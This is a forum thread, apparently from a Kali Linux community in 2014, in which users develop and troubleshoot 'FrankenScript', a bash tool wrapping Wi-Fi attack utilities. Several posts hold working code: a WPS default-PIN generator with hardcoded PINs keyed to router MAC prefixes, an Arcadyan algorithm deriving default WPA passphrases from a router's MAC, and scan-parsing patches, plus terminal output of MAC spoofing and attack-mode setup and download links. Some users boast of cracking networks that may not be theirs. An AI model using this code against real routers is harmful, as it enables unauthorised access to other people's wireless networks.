Slim... We all know it not you... Breathe! LoL
Upload to 0bin.net (thats a zero and then bin.net) great for all kinds of uses as its an encrypted pastebin
Or use Dropbox if you want.
You assembled a great script and we all want to access it.
Slim... We all know it not you... Breathe! LoL
Upload to 0bin.net (thats a zero and then bin.net) great for all kinds of uses as its an encrypted pastebin
Or use Dropbox if you want.
You assembled a great script and we all want to access it.
@ zimmaro
Cheers for the suggestion mate, will look into it.
@ brazen
Cheers for the suggestion, will look into it too.
Sorry it sounde like I was moaning/bitching at you, I wasn't, It's just how I talk/type. LOL
@ flyinghaggis
I'll run through the obvious first:
1) Did you select you WiFi device?.
2) Is your WiFi device listed under the main menu screen (Chosen Interface: wlan0)?.
3) Did you enable attack mode?.
4) Is attack mode listed under the main menu screen (System Mode: Attack Mode Enabled)?.
5) Does mon0 have a MAC address listed under the main menu screen (MAC address for mon0)?.
6) Is the temp folder in the FrankenScript directory empty?.
Other possible causes could be:
Sleep timing might need to be increased.
Its possible that you might have double tapped the keyboard button, or held it down too long.
If more people report issues I'll have to think about changeing the WiFi device detection, maybe the sleep timing, and maybe change the auto ENTER option to manual too.
FrankenScript-v3.1
UPDATED: 1/18/2014
MDK3 - access point reset files are now deleted.
Changed and added sleep timing.
Changed WiFi device detection again.
PasteBin:
http://goo.gl/PzaT5t
Last edited by slim76; 2014-01-18 at 15:45.
Smile while you can for in the future there my be nothing to smile about.
申し訳ありませんが、これは翻訳することができませんでした。
We tried to get your download as a download file from your sites.We spent an hour and never got the file. We went to the pastbin site and captured the text for Version3.1 When we ran the program we got an error at line 105 and an error at line 1552. We captured the file three(3) times and ran it and got the same error. We cannot capture the error as the screen constrantly blinks and is refreshed. Line 105 is an illegal operation -s and line 1552 says read arg count
sorry i have no idea just found it while searching around.
I also finally got around to test your version 1.3 of frankenscript i really like it cracked a wps enabled router but i do have one problem fsc.JPG when scanning for networks to collect a handshake your script dosent display the full name of the router. as you can see from my screenshot this could be a problem the suddenlink routers have some code that follows its name.
Smile while you can for in the future there my be nothing to smile about.
申し訳ありませんが、これは翻訳することができませんでした。
Sorry matey, I'll look into it and see if I can fix it for the next update.
Does it contain any symbols or does it just consist of characters and digits?, Can you post an example ( Full broadcast essid ) please.
Try this:
Look in FrankenScript for the following lines:
----------------------------------------------------------------------
###### [4] Capture WPA/WPA2 Handshake ######
4)
cd $HOME/FrankenScript/temp
clear
echo $RED"Scan for possible targets."
echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
read -p $GREEN"Press [Enter] to start the scan.$STAND"
xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0
tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
sleep 1
PresentedAPs=$(cat PresentedAPs.txt)
Change this line:
---------------------------
cat temp0.txt | sed 's/^................................................. .........................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
Replace it with this line:
--------------------------------------
cat temp0.txt | awk '{ print $11 }' | nl -ba -w 1 -s ': ' > PresentedAPs.txt
Last edited by slim76; 2014-01-28 at 13:31.
I tried your fix i didn't help but here is a screen shot of the networks suc.JPG
Smile while you can for in the future there my be nothing to smile about.
申し訳ありませんが、これは翻訳することができませんでした。
I can't see any reason why its doing what you say.
The only thing I can think of is that the broadcast essid might have spaces in its name, I used the awk command to print columns so anything with a space would be a different column and wouldn't be printed on the screen.
They don't have any spaces i believe its caused by the period in there names because that's where it cuts off at
Smile while you can for in the future there my be nothing to smile about.
申し訳ありませんが、これは翻訳することができませんでした。
Its strange cause you've tried two different commands.
One command grepped for the last column, the other command deleted everything upto the begining of the essid (so the essid and everything after should have been printed).
I'm still updating FrankenScript, it would have been done already if I hadn't deleted stuff that I shouldn't have. :-(
i made an update of wpspin and i implemented the algorithm corrected in bash in a function called aracadyan
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the mac adress of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING wich are the 7 numbers of the PIN
than it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )
Code:ARCADYAN(){ # WPSPIN 1.5 - GPL v 3 by kcdtv # This function uses three amazing works # 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc # 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51 # 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com) # # Thanks to the three of them for their dedication and passion and for deleivering full disclosure and free code # This function is based on the script easybox_keygen.sh previously mentioned # # The quotation from the original work start with double dash and are beetwen quotes # Some variables and line are changed for a better integration and I add the PIN calculation and Coeamn trick for default WPA # the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged" # This function requires $BSSID which is the mac adress ( hex may format XX:XX:XX:XX:XX:XX) # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to # give the full WPS PIN ($PIN) ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) # supression of $take5 and $last4 compared with esaybox code, the job is directly done in the array value assignation, also the variable $MAC has been replaced by $BSSID taht is used in WPSPIN ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged K1=$((($c1)%16)) ######unchanged K2=$((($c2)%16)) ######unchanged X1=$((K1^${deci[3]})) ######unchanged X2=$((K1^${deci[2]})) ######unchanged X3=$((K1^${deci[1]})) ######unchanged Y1=$((K2^0x${hexi[1]})) ######unchanged Y2=$((K2^0x${hexi[2]})) ######unchanged Y3=$((K2^0x${hexi[3]})) ######unchanged Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged Z3=$((K1^K2)) ######unchanged STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) # this to genrate later our PIN, the 7 first digit DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1) # the change respected to the original script in the most important thing, the default pass, is the adaptation of Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass CHECKSUM }
I put you back CHECKSUM in case it helps you
Code:CHECKSUM(){ # The function checksum was written for bash by antares_145 form crack-wifi.com PIN=`expr 10 '*' $STRING` # We will have to define first the string $STRING (the 7 first number of the WPS PIN) ACCUM=0 # to get a result using this function) ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc.... ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven number DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control " PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000 } # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if yiou have any question about it do not hesitate to ask
cheers
Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please fee free to add any credits or such.
Code:#!/bin/bash # # # ##################################################################### AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt) AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt) ESSID=$(echo $AP_essid) BSSID=$(echo $AP_bssid) ##################################################################### FUNC_CHECKSUM(){ ACCUM=0 ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` DIGIT=`expr $ACCUM '%' 10` CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` PIN=`expr $PIN '+' $CHECKSUM` ACCUM=0 ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'` RESTE=`expr $ACCUM '%' 10` } CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':') FINBSSID=$(echo $BSSID | cut -d ':' -f4-) MAC=$(echo $FINBSSID | tr -d ':') CONVERTEDMAC=$(printf '%d\n' 0x$MAC) FINESSID=$(echo $ESSID | cut -d '-' -f2) PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':') CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':') MACESSID=$(echo $PAREMAC$FINESSID) STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PINWPS1=$(printf '%08d\n' $PIN) STRING2=`expr $STRING '+' 8` PIN=`expr 10 '*' $STRING2` FUNC_CHECKSUM PINWPS2=$(printf '%08d\n' $PIN) STRING3=`expr $STRING '+' 14` PIN=`expr 10 '*' $STRING3` FUNC_CHECKSUM PINWPS3=$(printf '%08d\n' $PIN) if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]]; then CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID) RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'` STRING4=`expr $RAIZ '+' 7` PIN=`expr 10 '*' $STRING4` FUNC_CHECKSUM PINWPS4=$(printf '%08d\n' $PIN) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 " PIN4REAVER=$PINWPS4 else case $CHECKBSSID in 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 $RED"Other Possible Pin"$RED:$STAND $PINWPS2 $RED"Other Possible Pin"$RED:$STAND $PINWPS3" PIN4REAVER=$PINWPS1 ;; 001915) echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670" PIN4REAVER=12345670 ;; 404A03) echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428" PIN4REAVER=11866428 ;; F43E61 | 001FA4) echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670" PIN4REAVER=12345670 ;; 001A2B) if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760" PIN4REAVER=88478760 else echo -e "PIN POSSIBLE... > $PINWPS1" PIN4REAVER=$PINWPS1 fi ;; 3872C0) if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]]; then echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486" PIN4REAVER=18836486 else echo -e "PIN POSSIBLE > $PINWPS1" PIN4REAVER=$PINWPS1 fi ;; FCF528) echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761" PIN4REAVER= 20329761 ;; 3039F2) echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917" PIN4REAVER=16538061 ;; A4526F) echo -e "several possible PINs, ranked in order> 16538061 88202907 73767053 16702738 43297917 18355604 " PIN4REAVER=16538061 ;; 74888B) echo -e "several possible PINs, ranked in order> 43297917 73767053 88202907 16538061 16702738 18355604" PIN4REAVER=43297917 ;; DC0B1A) echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917" PIN4REAVER=16538061 ;; 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 " PIN4REAVER=$PINWPS1 ;; 002275) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 08863B) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 001CDF) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 00A026) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 5057F0) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; C83A35 | 00B00C | 081075) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; E47CF9 | 801F02) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; 0022F7) echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1" PIN4REAVER=$PINWPS1 ;; *) PIN4REAVER=$PINWPS1 ;; esac fi
Last edited by slim76; 2014-01-30 at 03:09.
you should collect the arcadyan mac to redact your case in condition
where you have the X you put the 6 first digit of aracdyan the mac without the 2 pointsCode:;; XXXXXX | XXXXXX)
and then you generate string
than you generate the checksum to get the full PINCode:deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) K1=$((($c1)%16)) K2=$((($c2)%16)) X1=$((K1^${deci[3]})) X2=$((K1^${deci[2]})) X3=$((K1^${deci[1]})) Y1=$((K2^0x${hexi[1]})) Y2=$((K2^0x${hexi[2]})) Y3=$((K2^0x${hexi[3]})) Z1=$((0x${hexi[2]}^${deci[3]})) Z2=$((0x${hexi[3]}^${deci[2]})) Z3=$((K1^K2)) STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
Code:PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PIN4REAVER=$(printf '%08d\n' $PIN)
that will give you
Code:;; XXXXXX | XXXXXX) deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g')) hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) K1=$((($c1)%16)) K2=$((($c2)%16)) X1=$((K1^${deci[3]})) X2=$((K1^${deci[2]})) X3=$((K1^${deci[1]})) Y1=$((K2^0x${hexi[1]})) Y2=$((K2^0x${hexi[2]})) Y3=$((K2^0x${hexi[3]})) Z1=$((0x${hexi[2]}^${deci[3]})) Z2=$((0x${hexi[3]}^${deci[2]})) Z3=$((K1^K2)) STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev) PIN=`expr 10 '*' $STRING` FUNC_CHECKSUM PIN4REAVER=$(printf '%08d\n' $PIN)
taht you have to place in your case esac sentence, anywhere untill it is before
Code:;; *)
Sorry mate I mean't would you be able to amend the script I posted so I only have to paste it back into FrankenScript.
I know its kinda cheeky to ask, sorry. :-)
I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL
At least explain me more what you want to do, how you want to call the variables, where it is supposed to go, for what...
you want to generate the PIN for all devices or just for arcadyan?
( it seems that the arcadyan algorithm is used by Askey on some models if i get confirmation of this i will post it here
cheers
Updated FrankenScript to 3.2.
Slim,
at different points when I have to click [enter] to start a scan, a second terminal window opens then closes again quickly. I just downloaded 3.2 and it is still doing it.
root@kali:~# cd FrankenScript/
root@kali:~/FrankenScript# ./FrankenScript.sh
#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################
Chosen Interface:
System Mode: Networking Mode Is Enabled
MAC address for mon0:
Please choose an option?: 3
Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.
Please wait...
[ I THINK THIS IS WHERE THE SECOND WINDOW OPENS FOR HALF A SECOND AND THEN CLOSES AND I AM BACK TO THE PRIMARY WINDOW]
Available Access Points.
Please input the number of your chosen target:
slim... this may just be me... see below... it worked correctly this time when i chose to disable processes that might cause issues: Y
********************************************
Please choose an option?: 1
Available WiFi Adapters.
########################
1: wlan0
Please input the number of your chosen WiFi adapter: 1
#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################
Chosen Interface: wlan0
System Mode: Networking Mode Is Enabled
MAC address for mon0:
Please choose an option?: 2
What system mode would you like to set.
[1] = Put The System Into Networking Mode.
[2] = Put The System Into Attack Mode.
[3] = Return To Menu.
1, 2 or 3?: 2
Would you like to disable processes that might cause issues y/n?: y
Would you like to disable NetworkManager y/n?: y
Would you like to disable wpa_supplicant y/n?: y
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
3051 dhclient
3057 dhclient
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
Permanent MAC: b8:8d:12:30:6b:f2 (unknown)
Current MAC: b8:8d:12:30:6b:f2 (unknown)
New MAC: 40:2d:60:68:79:8f (unknown)
#########################################
# FrankenScript #
#########################################
# #
# [1] Interface Selection #
# [2] System Mode Selection #
# [3] Attack A WPS Enabled Access Point #
# [4] Capture WPA/WPA2 Handshake #
# [5] WEP Attacks #
# [6] Attack Handshake.cap Files #
# [7] Show Recovered Passkeys #
# [8] Recovered Passkey Checker #
# #
#########################################
Chosen Interface: wlan0
System Mode: Attack Mode Is Enabled
MAC address for mon0: 40:2d:60:68:79:8f
Please choose an option?: 3
Scan for WPS enabled access points.
Press Ctrl+c on the wash screen to stop the scan and to choose a target.
Press [Enter] to launch the scan.
Glad to hear its working for you, You'll have to have a little play with it to get use to it and to find out what works for you.
So what's your opinions regarding FrankenScript?, anything you would like to see added to it?.
All constructive criticism welcome. :-)
Last edited by slim76; 2014-02-06 at 23:36.
Due to the lack of feedback and interest I very much doubt that I'll be releasing any further updates or scripts.
id like to see other things you release
Smile while you can for in the future there my be nothing to smile about.
申し訳ありませんが、これは翻訳することができませんでした。
I'm very interested in trying this out slim. and major props for making it
I will be testing it out tonight on BT5 R3 and see if it works. It should in theory since I have dhcp3 client / server and mdk3 already installed and up to date.
I am also installing kali right now on another USB stick so we'll see how this goes.
Once again thanks for this major works. I looked at the script and it is huge. One of the largest I've ever seen next to Social engineering toolkit.
Hi slim,
I finally have time to try your script in the weekend with WPS attack option for my TP-Link N750 router. Your script worked great, wash has no problem to find wps enabled APs and options for reaver is easy to incorporate. Just my router locked out easily but your mdk3 options come in handy to reset it. I think its just a matter of time for me to attack my router successfully.
You script is great to put many tools together for pentesting APs. I have yet to try attacking handshakes with your script.... can't wait to see your new update!
I've already updated option 6 again, it now supports drag and drop a wordlist or directory containing multiple wordlists.
Not sure if I'm going upload it for everyone though, but I guess time will tell.
To soxrox 2212
Any chance you could send us version 2. We tried kali-linux win7 and XP for hours.
Muskt Team A
Sorry Soxrox we were refering to FrankenScript-v3.2 our mistake. We are unable to download a copy where we are at present.
Any more updates on the script coming?
slim76 just wanted to let you know that I really love your script and I would love to get the updated version of it. It owned copule of Wifis in minutes so far with it
So was this script incorporated in 1.0.7?
How can we follow development of FrankenScript slim76? These forums are not the best way to get feedback from what I've noticed.
Anyways, continue the good work!!
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Slim, I was wondering if you could add a Belkin default password generator. Here is the git page from the developer, safari tells me that there may be possible phishing on the site but I think its clean... Proceed with caution. The original thread is here. Let me know if you can get it working!
@ learning.
I'm currenly rewriting a couple of the attack options, then I'll upload it.
@ Quest.
It's not included in Kali but you can download it from the first page, if the links are dead you can ask another member if they'll upload it for you, or you can wait for the updated version.
@ soxrok2212.
I added Belkin default password generator ages ago lol, I also added some others too. :-)
To all,
Will upload the new version when I've rewriten some of the options.
That is just great!
If someone that actually knows what he's doing can write a short Howto for that new version(to come) of FrankenScript, it will be appreciated. As obvious as some operations may seem to some of you, it is a complete mystery for others.
If some of you can 'torrent' it, It will facilitate accessibility for all.
Thank you for all the work Slim!! Hopefully it will make it's way in the next Kali.
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
dummy proof is good! Torrent though might help you diffuse your work. Any ETA on the new version Slim?
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Here's the latest FrankenScript.
WHEN DOWNLOADING, DO NOT CLICK THE BIG DOWNLOAD BUTTON AT THE TOP OF THE PAGE.
FrankenScript2-10-06-2014.tar.gz
http://mir.cr/0HBX0O5C
Last edited by slim76; 2014-06-10 at 00:08.
some of the downloads are NOT FrankenScript2-10-06-2014.tar.gz But FrankenScript2-10-06-2014.tar.gz.exe (322*576 b).
The download should be 1*081*616 b in size, named FrankenScript2-10-06-2014.tar.gz, and not an exe.
Thank you Slim!!
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge